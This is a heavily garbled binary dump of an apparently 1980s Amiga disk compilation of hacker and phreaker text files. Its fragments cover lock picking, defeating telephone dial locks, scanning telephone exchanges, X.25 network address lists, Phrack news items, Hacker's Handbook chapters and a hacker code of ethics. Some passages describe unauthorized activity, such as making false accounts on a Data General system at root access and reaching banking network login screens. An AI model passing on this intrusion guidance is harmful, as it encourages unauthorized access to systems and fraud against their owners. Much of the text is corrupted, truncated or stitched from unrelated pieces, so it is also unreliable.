>?'WPzT]DU,5EL0x`O?BW翽OfOp3z  M5?B Oo4V<*|@a L6! h#tiJ@A/ ~w%w*m`Mp "+K$+ Kˠ.N([{NJk1}SO#{C;dAS`hbgmEW74B"#\ PH jke'$F#4=0)cj`IlLd>N~GN@'Sc""N&n@ /j6 ctt&s居v]lb{* S>`^4 3d7'c0T\\eAĩ'Pd,<*#{0u,йfY('0x\Ɣj9dBzsm 6_N11C _@Mǰs25! IQH.e3|>hVAE0 {=' iԧq3(<0ƀ9 #!&]*/!(*{|`M=0=P! kWI(&9@!>],'Oӏ#~l@ 2<\ dɰSP1ʊO՚U4U xQ@~<.`| D.Eqmը?45rw<2,aCS^J"Ϙ9o?@`1La8zs$AS _Ơ*Hx(Iz j\ga prd#b{~ mK,#y8faGG$&8'U8¼sX$aCKtB E0 }Ā9GOcuBw A:D‹7i>Kr`{z`Cy;m"\Qą*`*5LPjC3l4fG1DxhͶ2:Vpރz.9 "0w7A7Y~}{p0\ AbcH7w v?i‡) muS4O>~P)q@Yv@(:HъQ0== uՇ 72DŪFfa0 J4cOa %aZ;cs 5P(ۥFݥ=MY -?p[, 3q d?,A#`LqNOFcHOG}`'h$Tuhh| ?D8?{I4iXfEaP݌(oѐ@RA; } (DDė_AjR/sZ ANxE!PkGd(%&(tHTZ@KjLUؒ !d4 яf`#?8xƼ?τ =x%Y9%fB ) (  Yam"G>e@m U)AsVn_74 QxA:T47@`P* >fi6|3FeﳣDN&p 3FG^p҂rEv162PPXU~&p '#@0Cք h/f]>Kډ9BCC@H͂@.WjVYLDO$C$$5z A0$, 2CKv,(k381C)R2&YV}]jUƢaR18-z,܂،@|R)uaV/iU']ƉP@Uh. J&Nf&v_ _Ɏ9B Ȃ Wi}鄈c~%2 WpvHi>g PF.UD(_ '1pP@~= b?ɠo_*[!5EK#K8NFGfa`ccqlDe%Ud*I8Ut=4mt\F8p<2PB;Ì :"t@(r : ܱXm{Cr6S N.Ns.C#%A0#''v.v 00ڃE= @ 9H`BmR@:pJ{Xpk(8j OD8<{`PL_~l#8(S#ij:%-g|K'x|@K*:>@w`~i~i䦵:݄,zNʉ~w@9%)ruǵː?~?9 0OZRAFt#nK`KG}j)wv@%02 &?GIz/!^Fg_PJJph`PV ㍊eaz;I~ dAN*`m86`>Wt#?`-f 9]AxY߳'1 Cp8L M~ȏ} ?ه >[$põHH YϨm%e\a#L#C6 6` 0ߏ) ^s ѣA%6,KN&IGDlF4%>-dl.+RV`8 $9O  +݇aHF@Hg.tBGCFJKMPWYq[_acgikmoqsuwy{} HACKERS AND HACKING PART # 1 oG{q.v3210/.CBA@?>=<;:9NMLKJIHGFEDYXWVUTSRQPOdvV$[menu]pek-Yc0x% h;"l @E|{IJͫ Ts/,>LpR cPF#a0 9?Q0MZ,pZ e#W􁂴&v8*~7`RpQHOC@G*88 dpAa<$xyLC-N_ |F(2p2ףt 3vI>Sґ^и%? & 6,@n 8 ~bA U4V@\vw ڈ &8(hB07=?`f=Pb񘠿"~ȴ6$ D'̱/ hj+1ߡK H&}͘BhY"Vd2bsu cbuu  scrolltextptA9ީA XRAUSTPAC # 1{KS1psba1m ACU PRESENTS TO YOU.....HACKERS AND HACKING PART # 1 COMPILED BY ACU. NOTE TO ALL READING...ACU NOR ACCEPTS OR CONDONES PHREAKING ACU ACCEPTS ABSOLUTELY ** NO ** RESPONSIBILITY FOR ANY ARTICLES OR MATERIAL IN THIS COMPILATION..SO PLEASE DON'T CONTACT US REGARDING THIS COMPILATION............... TO CONTACT ACU ON........ ACU WHQ (402) 393 - 0490 OR BLACK CHIP (ITALIAN ACU HQ) +39 - 564 - 27311 CALL ONE OF THEM SOON. WATCH OUT qd1Őc`l[Overlaydos.libraryACU menu loading......Please Wait. HCp,xN*@fLopNuN"A$Jf| &N":\$:vN <rN:I:)@ff"MNbLopNu)@ja.,"z / nfa"P*HN:LJgX"""A#EQB(_(T faJfQ`XC )QJga fapJg4&zx"faZ&SQ$ X"faBմSf`Q"z <x?șA Ag`a610QNqNqNqeNuprS@Sf< * QNu Hx\P|!%Yr_Nnw Dka-0P ~  6nR!0 d&& 0uYa2ATH${e:? aOQ9 ^"9T: ]࿘FcãyFxjC:s:.b TH%:<;p0951f0AO>2e6aD>8?J?A#0H@kY`@%P L}92p@|40bHCG ^?GR$`A0$<@Ba+J6~74Fb0p@`ip[ڍk7 6ZW1ba `א3C?4N^RJ3`)MJyə9@ ~!AAġ)5~7@:H8_.@ѷy|@9!A<O%5S .L( @@&K&!àzKQAhp)  `,4P.@7ai'Ui?@cA< u #bp"1 Cx@ T"1Tj$S; Gr'&sp(! /V$$9Q>9 D  HGm%g$F h BH~I I&BZǟ/L,X,P D,HؘIBi_;&T Aѹk A[hSPs "+D`tIUr/N^ȭ(\6XP$aL|cC(:yz~Q`Q0$0UVI0̧OvdV\`H`n-hcEcVLTJA@.($ob}@I{!$90BcQ20XcsD(sPAECkt0WPLTlzX*qT|vp +^Ń^F\^$:&!7郋,@D4pEB%-r!3H8-bV [= q :  a~Q0B8B{x514$M J 0Mкv2EEB'gs5"=ckiS$%Z\.1(3(1(2`:0(2(0!@ 83gnCY|(RLae!0)50-tT Y !1;wM|P$F +}.~c"rO'F*es&@tK" {a&ُ 9=_q I J:ru# a@[/#+*{ @i@ B/,dn7!q)fiƁlXp8&#B@q6*mXzRϔzܷ$4! jX&`0^PtH7mt= wGI0̻JJD(+#QiALhU(%ǰk^(Q2?AI K!KaFenaxF{T:(8<*$  |~hackp| }n }u53{|n[/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] |\| [ DP ] The Devil's Playground Network [ DP ] |/| |/| Presents |\| |\| Melbourne The following Australia |/| |/| In Association with |\| |\| The Forgotten Realm BBS |/| |/| [ DP~      ;,uU54{~m[/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] |\| [ DP ] The Devil's Playground Network [ DP ] |/| |/| Presents |\| |\| Melbourne The following Australia |/| |/| In Association with |\| |\| The Forgotten Realm BBS |/| |/| [ DP">u-55{[/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] |\| [ DP ] The Devil's Playground Network [ DP ] |/| |/| Presents |\| |\| Melbourne The following Australia |/| |/| In Association with |\| |\| The Forgotten Realm BBS |/| |/| [ DP̀U u27{Lz ]]]]]]]]]]#[[[[[[[[[[ ]] LOCK PICKING [[ ]] BY [[ ]] ^^^NIGHTWING^^^ [[ ]]]]]]]]]]#[[[[[[[[[[ SO YOU WANT TO BE A CRIMINAL. WELL, IF YOU ARE WANTING TO BE LIKE JAMES BOND AND OPEN A LOCK IN FIFTEEN SECONDS, GO TO HOLLYWOOD BECAUSETHAT'S THE ONLY PLACE YOUR GONNA DO IT. EVEN EXPERIENCED LOCKSMITHS CAN SPEND 5 TO 10 MINUTES ON A LOCK I>%]xpHLES OR MATERIAL IN THIS COMPILATION..SO PLEASE DON'T CONTACT US REGARDING THIS COMPILATION............... TO CONTACT ACU ON........ ACU WHQ (402) 393 - 0490 OR BLACK CHIP (ITALIAN ACU HQ) +39 - 564 - 27311 CALL ONE OF THEM SOON. WATCH OUT  o4u )56{[/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] |\| [ DP ] The Devil's Playground Network [ DP ] |/| |/| Presents |\| |\| Melbourne The following Australia |/| |/| In Association with |\| |\| The Forgotten Realm BBS |/| |/| [ DP2-ou 57{[/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] |\| [ DP ] The Devil's Playground Network [ DP ] |/| |/| Presents |\| |\| Melbourne The following Australia |/| |/| In Association with |\| |\| The Forgotten Realm BBS |/| |/| [ DP:ɡG\[ZYXWVUTSRgfedcba`_^]rqponmlkjih}|{zyxwvuts~mu m58{[/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] |\| [ DP ] The Devil's Playground Network [ DP ] |/| |/| Presents |\| |\| Melbourne The following Australia |/| |/| In Association with |\| |\| The Forgotten Realm BBS |/| |/| [ DPΏIHQPO vr17{OCw Here is a list of international telephone numbers that The DEVILS PLAYGROUND found while exploring the BBS's of the U.S. (toll free of course!) >>PHUN NUMBERS<< 202-456-1414 WHITE HOUSE 202-545-6706 PENTAGON 202-343-1100 EPA 714-891-1267 DIAL-A-GEEK 714-897-5511 TIMELY 213-571-6523 SATANIC MESSAGES 213-664-7664 DIAL-A-SONG 405-843-7396 SYNTHACER MUSIC 213-888-7636 DIAL-A-POEM 213-765-1000 LIST OF MANY NUMBERS 512-472-4263 WIERD 512-472-9941 "INSERT .25" 203-771-3930  ΁?>=<NMLKJvA12{Jt-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ Countries connected to the International Packet Switching Stream ++ ++ (or is it Service?) ++ ++ Brought to you by ----====} THE FORCE {====---- thanx to: HOSTESS ++ ++ DATAPAC ++ ++ From the depths of - THE REALM - 22/12/86 Updated: 26/12/86 ++ ++++++++++++++++++;w321FEDCBA@"! -v)20{VH4;------------------------------------------------------------- - HACKING VAX/VMS. UPLOADED BY -=> Crimson Pirate <=- - ------------------------------------------------------------- _____________________________ /_____________________________\ / \ | Inside Vax/Vms | | Using Command Procedures | | | | Nrg Uspտ\" NraSTARTUP-SEQUENCE )radd21k menu menu k menu Nr sp !->Nrimenudata;:D߾ߺ߼߼߻߻߹߼ײ߳߯ߩ߬߾ߺׯߧ pD By | | Master Blaster | \_____________________________/ Advanced Telecommunications Inc. Note: The following is geared for the more advanvced hacker. Part 1: Using Command Procedures. ----- ------- ---------- You can use command procedures to automate sequences of commands that you use quite often. For example, if you always use the DIRECTORY command after you move to a U Sub-Directory where work files are kept, you can write a simple command procedure to issue the SET DEFAULT and DIRECTORY commands for you. The following example, GO_DIR.COM, contains two commands: $ Set Default [perry.accounts] $ directory Instead of using each command alone, you can execute GO_DIR.COM with the command: $ Go_Dir This command tells the DCL command interpreter to read the file GO_DIR.COM and executes the commands in the file. So the command interzpreter sets your default directory to[PERRY.ACCOUNTS] and issues the DIRECTORY command. Note: DCL means Digital Command Language. (sorry) Formatting Command Procedures ---------- ------- ---------- Use the DCgH,+++9 CREATE to create and format a command procedure. When you name the command procedure, use the default file type COM. If you use this default, you don't have to use the file type when you execute the procedure with the command. Command procedures PVcontain DCL commands that you want the DCL command intepreter to execute and data lines that are used by these commands. Commands must begin with a dollar sign. You can start the command string just after the dollar sign. Data lines do not start with a dollar sign. Data lines are used as input data for commands. Data lines are used by the most recently issued command. The following examle shows command and data lines in a command procedure. $ mail SEND THOMA˟S MY MEMO Did you get my memo? $ $ Show users thomas The first line is a command and must start with a "$". The next lines are data lines that are used by the mail function; these lines must not start with "$". Using Multiple Lines for One Command ----- -------- ----- --- --- ------- If you are writing a command that includes many qualifers, you can make the command procedure more readable by listing the qualifers on seperate lines rather than running them togeth1#"! 0/.-,+*)('&;:9876546v$34{4 OTC DATA ACCESS UPDATE ON THE MIDAS FILES 1/2 ORIGINALLY UPLOADED BY THE BUZZARD UPDATE TYPED IN BY THE BUZZARD 16TH MARCH, 1989 This is an update on the Midas files uploaded to various BBS' in the Melbourne district some time ago. It has come about by the introduction of the OTC Data Access system which in part replaces the Midas System. This file is [     %$<v.3{$ The September 1989 -=- Apple Odessa -=- September 1989 Presents ----------------------------------------------------------------------------- AUSTPAC Price List. ----------------------------------------------------------------------------- A file bought to you by Negative Energy. Introduction ------------ The AUS\ v.fastdir{*1PpB1stpac.help-N2stpac.infoeL3stpac.prices<4.15.125.2t&t;6.3r.notes.2A7.428.5ici>9.6.part2{10tents.811a.gen.tutss12c.list.all13ce.file.1˕Iv41{Jk #### PHRACK PRESENTS ISSUE 16 #### ^*^*^*^Phrack World News, Part 3^*^*^*^ **** File 10 of 12 **** [Ed's Note: Certain names have been change in the article to protect the author] The Flight of The Mad Phone-Man's BBS to a Friendly Foriegn Country Using my knowledge that the pigs grab your computer when they bust you, I got real worried about loosing a BIG investment Ive got in my IBM. I decide tq.2v4{H Chapter one - First Principles ------------------------------ The first hack I ever did was executed at an exhibition stand run by BT's (RAD: Oh! By the way, for any one reading this, if u haven't worked it out yet, BT stands for British telecom!!) then rather new Prestel service. Earlier, in an adjacent conference hall, an enthusiastic speaker had demostrated viewdata's potential world-wide spread by logging on to Viditel, the infant Dutch service. He had had, as so often happe-1v23{6 >>>>>>>>>>>> Introduction <<<<<<<<<<<< This tutorial will be focusing on the 'phone side of hacking. I will include numbers, passwords, and other bits of interesting info that I have picked up during my career as one of the >ELITE< hackers here in Australia. I will also include information on the American 'Telenet' system, though I regret I have no password (yet) for the Midas data-link system. Well, now, onto the juicy stuff.. here goes.. >>>>>>>>>>>>> Dial Locks <<<~d<<<<<<<<<< Have you ever been into an office, and found that some barstard has put a dial lock so that the dial can't be turned? Well, you can use that phone, it's just a bit harder than normal. What you have to do, is pick up the phone, and press the receiver button >RAPIDLY< the number of times needed for that digit. For example, to dial 762-1582, you would press the receiver button 7 times, pause, then 6 times, pause, then 2 times, etc. Make sure yoy{u do this quickly and evenly. Practice on your own number, and you'll get an engaged tone when you succeed. Good luck! >>>>>>>>>> Exchange Scanning <<<<<<<<<< Have you ever wondered about those 11 numbers? Like 11612 for Bible Readings, etc. Ever noticed that those numbers are not sequential? Ever wondered what lies in between? Well, I wondered about that once too, so here is a list I have made of all the 11 and 01 numbers.. Here goes.. 01 numbers: 0100 ISD enquiries 0101 International bookings 0102 International enquiries 0103 Directory assistance - International 0104-0105 STD error message 0106 not connected 0107 operator 0108 Booking + enquries - ships at sea 0109 tones (for testing?) 011 Trunk bookings 012 Trunk enquiries 013 Directory assistance 014 not connected 015 Telegrams 016 not connected 0170 Directory assistance - other states 0171 F not connected 0172 #8 0173 Wakeup and reminder calls 0174 Telegram enquiries 0175 Directory assistance - STD 0176 "Number Please" 0177 "Can I help you" 0178-0179 not connected 018 #8 0190 <<<<<< see below 0191 not connected 01921 Austpac - 300 baud 01922 Austpac - 1200/75 01923 Austpac - Videotext 01924 not connected 01925-01926 Austpac 01927 not connected 01928 #8 01929 not c 3onnected 0193 not connected 0194 not connected 01950 not connected 01951 Austpac - 300 baud 01952 Austpac - 1200/75 01953 Austpac - Videotext 01954 not connected 01955-01956 Viatel - 1200/75 01957 not connected 01958 #8 01959 not connected 11 numbers: 1100 Difficulties and faults 1101 engaged 1102 engaged 1103 <<<<<< see below 1104 Difficulties and faults - Mobile Telephones 1105 engaged Ls1106 engaged 1107 Difficulties and faults - 008 Lessees 1108 #8 1109 engaged 1110-1129 not connected 1130 ringback 1131-1132 operators 1133-1135 not connected 1136 ringback 1137-1138 not connected 1139 Re-direction number 11400-11409 not connected 11410-11429 operators 11430-11439 not connected 11440 faint not connected 11441 Fire Brigade 11442-11443 faint not connected 11444 D24 Police 11445 faint not cFnonnected 11446 not connected 11447 faint not connected 11448 #8 11449-11489 not connected 11490-11499 operators 11500 Bass credit bookings 11501-11502 Stock exchange reports 11503-11507 not connected 11508 #8 11509 not connected 11510 ringback 11511 Stock exchange A-H 11512 not connected 11513 Stock exchange Industrials 11514 not connected 11515 3XY competition line 11516 not connected 11517 Stock exc luhange I-Z 11518 Motor rego information 11519 not connected 11520 Pools results 11521 Tattslotto results 11522 Bass credit bookings 11523-11524 not connected 11525 Magpie hotline 11526-11530 not connected 11531 Ring-a-recipe 11532 not connected * 11533 not connected 11534 Financial speaking 11535 Dial-a-champ 11536 3AK Garden line 11537 not connected 11538 Quit Smoking 11539 not connected 11540  r Fire restrictions 11541 Boating weather 11542 not connected 11543 not connected * 11544 Thredbo news 11545 VSA snowline 11546-11549 not connected 11550 Eyewitness news phone poll 11551 Passenger shipping 11552-11557 Eyewitness news phone poll 11558 not connected 11559 Eyewitness news phone poll 11560 Dial-a-pet 11561 Telecom loans 1-10 (free call) 11562 Telecom loans 11-16 (free call) 11563 Telecom lo Gans 17+ (free call) 11564-11565 not connected 11566 operator 11567 not connected 11568 1985 Ford Aust. open 11569 not connected 11570 Green phone tone info 11571 Holiday ideas 11572 ringback 11573 Police Advisory Line 11574-11576 ringback 11577 Dial-a-restaurant 11578 ringback 11579 Mt Buller ski line 11580-11584 not connected 11585 150th hotline 11586-11587 not connected 11588 3XY musicline 11589-11598 nˎ >vJ42{devsp{|ZSYSTEM-CONFIGURATIONkz 5 qq  ,genericK BgenericACU-COMP oG{t #### PHRACK PRESENTS ISSUE 16 #### ^*^*^*^Phrack World News, Part 4^*^*^*^ **** File 11 of 12 **** Shadow Hawk Busted Again ======================== As many of you know, Shadow Hawk (a/k/a Shadow Hawk 1) had his home searched by agents of the FBI, Secret Service, and the Defense Criminal Investigative Services and had some of his property confiscated by them on September 4th. We're not going to reprint  a;v W5{&wCHAPTER TWO - Computer-to-Computer Communications ------------------------------------------------- Services intended for access by microcomputers are nowadays usually presented in a very user-friendly fashion: pop in your software disc or firmware, check the connections, dial the telephone number, listen for the tone ... and there you are. Hackers, interested in venturing where they are not invited, enjoy no such luxury. They may want to access older services which preceeded th"(@~v u24{C CTRL-S STOP/START SPACEBAR TO EXIT -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=- -= =- -= >>>>>>>>>The<<<<<<<<< =- -= <> =- -= <<<<<< Part 2 >>>>>> =- -= <<<<< Version 2 >>>>> =- -= >>>>>>>>>>><<<<<<<<<< =- -= =- -= >>>By The Wizard!!<<< =- -= =- -= Written September, 1985 =- -= Updated 11th Decemb˒gv 43{2# #### PHRACK PRESENTS ISSUE 16 #### ^*^*^*^Phrack World News, Part 5^*^*^*^ **** File 12 of 12 **** "Phone Companies Across U.S. Want Coins Box Thief's Number" From the Tribune - Thursday, Nov. 5, 1987 SAN FRANSICO - Seven telephone companies across the country, including Pacific Bell, are so frazzeled by a coin box thief that they are offering a reward of $25,000 to cat#d?ihgfedcba`utsrqponmlk~}|{zyxwvAw6 {6CHAPTER 3 - Hackers' Equipment ------------------------------ You can hack with almost any microcomputer capable of talking to the outside would via a serial port and a modem. In fact, you don't even need a micro; my first hack was with a perfectly ordinary viewdata terminal. What follows in this chapter, therefore, is a description of the elements of a system I like to think of as optimum for straight-forward asynchronous ASCII and Baudot communications. What is at issue imNMLKJ_^]\[ZYXWVUj wr25{j5-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=- -= =- -= >>>>>>>>>The<<<<<<<<< =- -= <> =- -= <<<<<< Part 3 >>>>>> =- -= <<<<< Version 2 >>>>> =- -= >>>>>>>>>>><<<<<<<<<< =- -= =- -= >>>By The Wizard!!<<< =- -= =- -= Written September, 1985 =- -= Updated 11th December, 1985 =- -= ȁ<;:987654IHGFEDCBA@?OTSRQP2ws7&{PCHAPTER FOUR - Targets ---------------------- Wherever hackers gather, talk soon moves from past achievements and adventures to speculation about what new territory might be explored. It says much about the compartmentalisation (RAD: 20 letter words!) of computer specialities in general and the isolation of micro-owners from mainstream activities in particular that a great deal of this discussion is like that of navigators in the days before Columbys: the charts are unreliable, "o[('&%$#"! 3210/.-,+*)>=>w8?{=}Chapter 5 - Hackers Intelligence -------------------------------- Of all the features of hacking that mystify outsiders, the first is how the hacker gets the phone number that give access to the computer systems, and the passwords that open the data. Of all the ways in which hacking is portrayed in films, books and tv, the most misleading is the concentration on the image of the solitary genius bashing away at the keyboard trying to 'break-in'. It is now time to reveal one of th.n     Ww66{x46 --------------------------------------- [CTRL-S PAUSES/SPACE=QUIT] WATS EXTENDERS MANY PEOPLE THINK OF PHONE PHREAKS AS SLIME, OUT TO RIP OFF BELL FOR ALL SHE IS WORTH. NOTHING COULD BE FURTHER FROM THE TRUTH! GRANTED, THERE ARE SOME WHO GET THERE KICKS JUST BY MAKING FREE CALLS, HOWEVER THEY ARE NOT TRUE PHONE PHREAKS. REAL PHONE PHREAKS ARE "TELECOMMUNICATIONS HOBBYISTS" WHO EXPERIMENT, PLAY WITH AND LEARN FROM THE PHONE SYSTEM. OCƾ{wq9{μtCHAPTER SIX - Hackers' Techniques --------------------------------- The time has now come to sit at the keyboard, phone and modems at the ready, relevant research materials convenient to hand and see what you can access. In keeping with the 'handbook' nature of this publication, I have put my most solid advice in the form of a trouble-shooting appendix (I), so this chapter talks about around the techniques rather than spelling them out in great detail. HUNTING INSTINCTS Good hac>pcpm: add21Kt,,B,yC4Nh#,CENh#0`.graphics.libraryintuition.library y0"h8 iX|0) 2) i,y,N,y0N"y0,yNb"y,NbNuJ $ZznQ>xzR dldDP_ϋ ' ^Na~|Ŗ8(Nx,O| txH )17>~~ Q@@~>vo~ ¸UӖH#y:}Ƈyx|,̈́V-,+*)('&%$#87654a`_^]\[ZonmlkjihgferzyxwRpPshoww&`HA PJ"H,xHE6 a2L/&IP .P,SN @I (g @BI to log off :" NOW AT THE PROMPT TYPE ^C^E, THE SYSTEM WILL RESPOND W $j/.-,+*)(= hNrvexecuteө2ITH A SEMI-AOS PROMPT. THE USUAL PROMPT IS ")" TELEDATA OPERATORS HAVE A "*)" PROMPT YOU GET JUST A "* RUN " PROMPT. NOW THE SYSTEM IS CURRENTLY ASKING YOU TO RUN A PROGRAM. SINCE YOU ARE IN VISITOR MODE YOU CAN PROBABLY ONLY TYPE "BYE" DUE TO THE LEVEL OF PRIVS YOU HAVE, BUT WITH GREATER ACCESS TRY TYPING "UTIL" OR "PER". WHAT TO DO IF YOU GET ROOT ACCESS ON A DG. ------------------------------------------ SMILE! YOU NOW HAVE THE HIGHEST POSSIBLE ACCESS ON A DATA ق3|Y GENERAL COMPUTER.QUITE FRANKLY YOU HAVE THE SYSTEM AT YOUR MERCY. WITH ROOT ACCESS YOU HAVE THE FOLLOWING PATHS AVAILABLE. ROOT | / | \ PER UTIL UDD NOW PER IS THE PERIPHIAL DIRECTORY UTIL SYSTEM UTILITIES DIRECTORY UDD USERS DIRECTORIES DIRECTORY BOY!! DONT THIS MAKE YA MOUTH WATER? WITH THE UTILITIES DIRECTORY YOU CAN SET UP FALSE ACCOUNTS, CHANG HACKING ATM'S <-- + + + + Written By: + + + + =-=-=-=-=-=-=-=-=-=-=-=-=-= + + = B L U E T H U N D E R = + + =-=-=-=-=-=-=-=-=-=-=-=-=-= + : mww13{  4NrrunNpF O R C E F I L E S Volume #1 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From The Depths Of - THE REALM -, By: ----====} THE FORCE {====---- 12/03/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= FOREWARD -------- Welcome To the FORCE FILES From the Depths of The Realm. What is THE REALM you may ask? Well, just one of the boards I have sysoped, this one was (OR IS, WHO KNOWS) an International BBS with an ? Mba`_^]\[ZYXmlkjihgfedcxwvutsrqpon~}|{zyww 14{#aF O R C E F I L E S Volume #2 By: ----====} THE FORCE {====---- 17/04/84 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= When trying to locate possible ranges where NUA's are to be found, the phone book is the best tool. Use the DNIC, then the PTSN area code followed by a likelly address. You will need to show at least some enterprise in obtaining the area codes since a phone book isn't all that helpfull with sO&|7HI6<<a.N<<a&Q ,xN.SF FfaB|a /IC"QQXNuO&|zRFN} IRFN,I$N8<H<N&Ia6j RE EfNuЀja$"ga<N& taԀ׳(Sf`g"Ka`CpgUf !NuH&J:IV4f>JBg SEkJ SBfSg>f dVf dFf d6f d&f d ~`,~f Q\~`p~`p~` p~`p~6f d f d"|;pX`  f B`|͌)w 22{  Hacker Code of ethics (RULES!) ------------------------------------ 1) No hacker will ever delete or damage information that belongs to a legitimate user of the system in any way that the hacker cannot easily correct himself. 2) No hacker will leave another hacker's name or phone number on any computer system or disclose it to anyone else unless express permission is given. He will leave his own on a system only at his own risk. 3) All hackers are expe߻cted to obtain and contribute their own account information, rather than use only information given to them by other hackers. 4) No hacker will deliberately or take steps which would risk destroying information, cause loss of computer or man time, money, partially or totally disabling or crashing anothers computer system network or anything associated. 5) No hacker, by their actions, will cause inconvienience to the public. No hacker will use information gained or acquired for캌ux the personal financial benefit or the benefit of others in anyway whether financial or by other means. Confidential information of a personal nature shall not be tampered with, distributed or acted upon. Other confidential information, including business material shall not published or distributed unless for another hacker. 6) No hacker will significantly affect the partial or total performance of the system being accessed. No hacker will perform or attempt any theft of tangablH%e objects. Most hackers follow those rules most of the time, because: 1) They would like to keep the account information they went to so much trouble to get. 2) They would like to stay out of legal trouble,if possible. 3) They like computers and don't have any reason to cause problems for them or the people who run them. network or anything associated. 5) No hacker, by their actions, will cause inconvienience to the public. No hacker will use information gained or acquired for>$ +*)('&%$#"!6543210/.-,A@?>=<;:987LKJIHGFEDCBRQPONWVUTStxF15{SNp-F O R C E F I L E S Volume #3 08/06/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From The Depths Of - THE REALM -, By: ----====} THE FORCE {====---- 08/06/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= N U A L I S T I N G S C O N T T E L E N E T 311030100xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;J   ox16{ 0k߰߻߲ѥ߬߻һҶЭ߲Ь߯Ы߯߫Я߮߹߾߫߬߻ߨ߱߶ߨߺߪ߼߯߯߫о߽߻Ҳߩ߲Ь߹߼Ҽ߾߫߾߰߫߸߶߹Ѷߦ߷ث߽߸߯ߨ߫ߪѫج߶߬߻оԒF O R C E F I L E S Volume #4 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From The Depths Of - THE REALM -, By: ----====} THE FORCE {====---- 08/0/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= N U A L I S T I N G S C O N T I T T / U D T S 310330100xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~4|ax'30{@ COMMANDS -------- *GLOC Searches an entire UFD for a given string of characters. *LABEL Writes a tape label. *LOGPRT Prints a system error log. *MAGNET Reads/writes non-Prime format tapes. *NETPRT Prints a network error log. *STBILL Runs storage calculations. *TRAP48 Not a command. Part of the 1648 emulation package. *USAGE ]i;pf BSfF|:F>f d6Cf d$:{0P`"@:{0X;pj gf FSfRF˻cĽf*JSEk%Sf`@9Lo`z'$1q;fJmL74gPr,9܋apͨ"Xf+GxEw5[)C/p ,(Bs4 69~pWR@99&t%BsSYS >N%C/C|Cb1p`p~H،|(ƐMniQ'Dyʜs /Q#8xEZL! #0;]8(|A` Fk&,3).JLUK~ t7_r 4pr7Ny( V&w1E6#OXy?r ⬿ȂbycN0K#sg8 ?d9$65t4 X!5*D#xItIB. Ff((Jv}e7VW3p r,'issecAp,b>taerc ot elbanU . ]N% [0[ u dnuorgkcaBILCqNN$o* B;q%_!SA0&K%,K$S>~>8!'Sހ^?$~6)()hp#AQ#c;T܌ 5ET " r e|FxPt -pH^Dhqd $!l`'\ k^(!K$lc4V\ D>| ^b[P vy rfHA6"0W1$32/;f$!)& ƫl@8b%mD01fFcJE` q|(3i#fsJseh8 |cr;`iQ;s|p<Nz.xNJagU/~ guJO! B/H^H!#(O !vOKGQ"` rFԠ(W0r;h&NnIT!w:PS$Z ᩁLraF`S \p tRN)tlR b"sf`C# (0&'bfJLH1TTpA>o11@DnAILp rT)$<B 4IHp "lGpDp4t@rCB#80tvԭt,x8=#8ps($_(p#^ ,pB [ 9A# jp"<)Ha&h` ApJuN PxuJw "&'gB.pr pJ5BFL%DQ(I g /A&t^""`[UuE/h0"mXhކ,.0A%@#Р  @|#C / no̱T LG PLEASE ENTER YOUR PASSWORD:-2-> CITICORP (CITY NAME). KEY GHELP FOR HELP. XXX.XXX PLEASE SELECT SERVICE REQUIRED.-3-> Type A User Commands User commands are either instructv`ions or information you send to the network for it to follow. The commands available are listed below. User Action: Purpose: @ (CR) To put you in command mode (mode in which you can put your currently active service on hold and ask the network for information, or log-off the service). (NOTE: This symbol also serves as the network prompt; see Type A messages.) BYE (CR) To leave service from command mode. Continue (CR) To return to application Cfrom command mode (off hold) D (CR) To leave service from command mode. ID To be recognized as a user by the network (beginning of sign on procedure), type ID, then a space and your assigned network ID. (Usually 5 or 6 characters long) Status (CR) To see a listing of network address (only from @ prompt) you need this address when "reporting a 갓 problem." Type A messages The network displays a variety of messages on your screen which either require a user command or provide you with information. Screen shows: Explanation: @ Network prompt -- request for Network ID. BAD PASSWORD Network does not except your password.
BUSY The address is busy, try back later. WELCOME TO CITIBANK. Network welcome banner. Second line provides address # PLEASE SIGN ON. to be used when reporting "problems." XX ILLEGAL You typed in an address that doesn't exist.
